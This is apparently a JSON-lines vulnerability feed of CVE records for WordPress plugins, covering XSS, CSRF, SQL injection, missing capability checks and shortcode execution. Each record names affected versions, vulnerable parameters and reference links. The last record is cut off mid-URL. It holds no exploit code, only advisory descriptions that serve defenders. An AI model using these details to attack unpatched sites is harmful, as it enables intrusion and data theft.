{"CVE_ID":"CVE-2025-2809","slug":"azurecurve-shortcodes-in-comments","versionImpact":"2.0.2","description":"The azurecurve Shortcodes in Comments plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/azurecurve-shortcodes-in-comments\\\/trunk\\\/azurecurve-shortcodes-in-comments.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/azurecurve-shortcodes-in-comments\\\/trunk\\\/azurecurve-shortcodes-in-comments.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/azurecurve-shortcodes-in-comments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/azurecurve-shortcodes-in-comments\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22cc6da1-fd22-4b2a-90ab-24086879f0f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22cc6da1-fd22-4b2a-90ab-24086879f0f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6540","slug":"web-cam","versionImpact":"1.0","description":"The web-cam plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018slug\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/web-cam\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/web-cam\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d2954c-762c-4bdc-8469-7fe19f4e980d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d2954c-762c-4bdc-8469-7fe19f4e980d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0153","slug":"vimeo-video-autoplay-automute","versionImpact":"1.0","description":"The Vimeo Video Autoplay Automute WordPress plugin through 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3459868-28aa-4a5d-94d8-bbc17e3ce653\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3459868-28aa-4a5d-94d8-bbc17e3ce653\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0763","slug":"clock-in-portal","versionImpact":"2.1","description":"The Clock In Portal- Staff & Attendance Management WordPress plugin through 2.1 does not have CSRF check when deleting Holidays, which could allow attackers to make logged in admins delete arbitrary holidays via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4b55f868-62f8-43a1-9817-68cd1fc6190f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4b55f868-62f8-43a1-9817-68cd1fc6190f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2275","slug":"wcfm-marketplace-rest-api","versionImpact":"1.5.3","description":"The WooCommerce Multivendor Marketplace \u2013 REST API plugin for WordPress is vulnerable to unauthorized access of data and addition of data due to a missing capability check on the 'get_item', 'get_order_notes' and 'add_order_note' functions in versions up to, and including, 1.5.3. This makes it possible for authenticated attackers with subscriber privileges or above, to view the order details and order notes, and add order notes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L167\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904331\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904331\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0520601-7e5c-412d-a8da-df1bf8ce28df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0520601-7e5c-412d-a8da-df1bf8ce28df?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L151\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L175\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36757","slug":"wp-hotel-booking","versionImpact":"1.10.1","description":"The WP Hotel Booking plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.10.1. This is due to missing or incorrect nonce validation on the admin_add_order_item() function. This makes it possible for unauthenticated attackers to add an order item via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9826d7-f8f5-4d3d-8145-3d4e6a63d784?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9826d7-f8f5-4d3d-8145-3d4e6a63d784?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368289%40wp-hotel-booking&new=2368289%40wp-hotel-booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368289%40wp-hotel-booking&new=2368289%40wp-hotel-booking&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46154","slug":"e2pdf","versionImpact":"1.20.18","description":"Deserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf \u2013 Export To Pdf Tool for WordPress.This issue affects E2Pdf \u2013 Export To Pdf Tool for WordPress: from n\/a through 1.20.18.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/e2pdf\\\/wordpress-e2pdf-plugin-1-20-18-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/e2pdf\\\/wordpress-e2pdf-plugin-1-20-18-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1649","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxDeleteCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete categories.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c63ddc62-a4f1-4da4-a65e-4573369d6c30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c63ddc62-a4f1-4da4-a65e-4573369d6c30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1413","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Timer widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f40956e0-6e5c-4965-84f8-2420ad14a299?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f40956e0-6e5c-4965-84f8-2420ad14a299?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8793","slug":"woocommerce-exporter","versionImpact":"2.7.2.1","description":"The Store Exporter for WooCommerce \u2013 Export Products, Export Orders, Export Subscriptions, and More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.2.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d3c44eb-ef25-43f5-a872-6ef52c3d9c1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d3c44eb-ef25-43f5-a872-6ef52c3d9c1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-exporter\\\/tags\\\/2.7.2.1\\\/includes\\\/settings.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-exporter\\\/tags\\\/2.7.2.1\\\/includes\\\/settings.php#L195\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11683","slug":"newsletter-subscriptions","versionImpact":"2.1","description":"The Newsletter Subscriptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'token_type' parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter-subscriptions\\\/newsletter_subcriptions.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter-subscriptions\\\/newsletter_subcriptions.php#L176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc0d1427-d01e-4054-8ba7-59d6878cfbea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc0d1427-d01e-4054-8ba7-59d6878cfbea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13318","slug":"essential-wp-real-estate","versionImpact":"1.1.3","description":"The Essential WP Real Estate plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the cl_delete_listing_func() function in all versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to delete arbitrary pages and posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-wp-real-estate\\\/trunk\\\/src\\\/Common\\\/Ajax\\\/Ajax.php#L724\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-wp-real-estate\\\/trunk\\\/src\\\/Common\\\/Ajax\\\/Ajax.php#L724\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a1a9e22-d174-43fc-aab6-f6968067a290?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a1a9e22-d174-43fc-aab6-f6968067a290?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13596","slug":"wp-survey-and-poll","versionImpact":"1.7.5","description":"The WordPress Survey & Poll \u2013 Quiz, Survey and Poll Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'id' attribute of the 'survey' shortcode in all versions up to, and including, 1.7.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L1457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L1457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996cb291-692d-4892-a3ab-ffad960ba732?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996cb291-692d-4892-a3ab-ffad960ba732?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13687","slug":"team-display","versionImpact":"1.3","description":"The Team Builder \u2013 Meet the Team plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_team_builder_options() function in all versions up to, and including, 1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-display\\\/tags\\\/1.3\\\/plugin.class.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-display\\\/tags\\\/1.3\\\/plugin.class.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c35e20f-bfb0-4de0-9f8f-6e04fbbe138a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c35e20f-bfb0-4de0-9f8f-6e04fbbe138a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1572","slug":"kivicare-clinic-management-system","versionImpact":"3.6.7","description":"The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the \u2018u_id\u2019 parameter in all versions up to, and including, 3.6.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with doctor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php#L330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php#L330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php#L331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245759\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245759\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245759\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245759\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kivicare-clinic-management-system\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kivicare-clinic-management-system\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6b0c35-b478-4616-a708-1fd243c95c14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6b0c35-b478-4616-a708-1fd243c95c14?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2805","slug":"order-post","versionImpact":"2.0.2","description":"The ORDER POST plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/order-post\\\/trunk\\\/wp_post_order.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/order-post\\\/trunk\\\/wp_post_order.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/order-post\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/order-post\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ea739-5ee9-4779-87d5-3f13b11229cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ea739-5ee9-4779-87d5-3f13b11229cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3878","slug":"sms-alert","versionImpact":"3.8.1","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_verify shortcode in all versions up to, and including, 3.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/helper\\\/shortcode.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/helper\\\/shortcode.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290478\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290478\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a85461b7-6d16-435c-a149-ad25419a1585?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a85461b7-6d16-435c-a149-ad25419a1585?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6537","slug":"namasha-by-mdesign","versionImpact":"1.2.00","description":"The Namasha By Mdesign plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018playicon_title\u2019 parameter in all versions up to, and including, 1.2.00 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/namasha-by-mdesign\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/namasha-by-mdesign\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f7616d0-7b42-4b2e-8378-18c24c7bf22b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f7616d0-7b42-4b2e-8378-18c24c7bf22b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0150","slug":"cloak-front-end-email","versionImpact":"1.9.1","description":"The Cloak Front End Email WordPress plugin through 1.9.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/517154dc-d6bd-462d-b955-061a7b7f8da5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/517154dc-d6bd-462d-b955-061a7b7f8da5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0762","slug":"clock-in-portal","versionImpact":"2.1","description":"The Clock In Portal- Staff & Attendance Management WordPress plugin through 2.1 does not have CSRF check when deleting designations, which could allow attackers to make logged in admins delete arbitrary designations via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9be952e0-d8ae-440f-8819-cb19485f35f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9be952e0-d8ae-440f-8819-cb19485f35f3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36756","slug":"wd-google-analytics","versionImpact":"1.2.8","description":"The 10WebAnalytics plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.8. This is due to missing or incorrect nonce validation on the create_csv_file() function. This makes it possible for unauthenticated attackers to create a CSV file via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2371142%40wd-google-analytics&new=2371142%40wd-google-analytics&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2371142%40wd-google-analytics&new=2371142%40wd-google-analytics&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db29f17d-1d2b-4f78-a78d-1579e2a5d975?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db29f17d-1d2b-4f78-a78d-1579e2a5d975?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilit